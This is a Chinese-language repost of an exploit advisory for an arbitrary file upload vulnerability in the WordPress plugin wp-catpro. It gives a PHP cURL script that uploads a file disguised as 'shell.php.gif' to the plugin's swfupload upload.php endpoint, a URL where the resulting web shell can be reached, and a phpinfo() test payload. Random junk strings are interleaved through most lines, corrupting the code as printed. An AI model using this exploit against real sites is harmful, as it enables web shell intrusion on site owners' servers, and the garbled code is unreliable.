WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
; n$ M- k# @7 X8 l#-----------------------------------------------------------------------

作者  => Zikou-16
邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
# }0 Q# n2 v, G6 L
/ b( y+ f0 a$ D, p2 t0 P#=> Exploit 信息:
7 R' O( Q, \" \9 \0 M4 `------------------
# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
3 |0 n9 M4 e1 z6 f# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
% d7 H5 j, N' m7 b* {# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

0 C5 z& n, A" Y) Z* ^) |1 x6 H#=> Exploit
-----------
<?php
# t- p3 k& r  I; t" o5 _
$uploadfile="zik.php.gif";
$ ^/ j. O) F) O  Q% o2 ?$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
" o" _) n1 ?+ s1 r* \2 S- icurl_setopt($ch, CURLOPT_POST, true);
* I  ?( g% H  q1 Ncurl_setopt($ch, CURLOPT_POSTFIELDS,
4 g+ Q0 A% b! W+ Z7 L$ Y' J* q7 N0 Darray('Filedata'=>"@$uploadfile",
4 q, r' ^3 l7 K& L4 m; R'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$ i4 y* _; u/ E3 a0 B: t: S0 y, M$ F8 u$postResult = curl_exec($ch);
, t/ B/ M/ f/ C/ ~) Scurl_close($ch);

print "$postResult";

; k3 O  R4 C* \3 v- g5 ^$ c2 cShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
  ?>
<?php
1 P) k: s+ u' Bphpinfo();
?>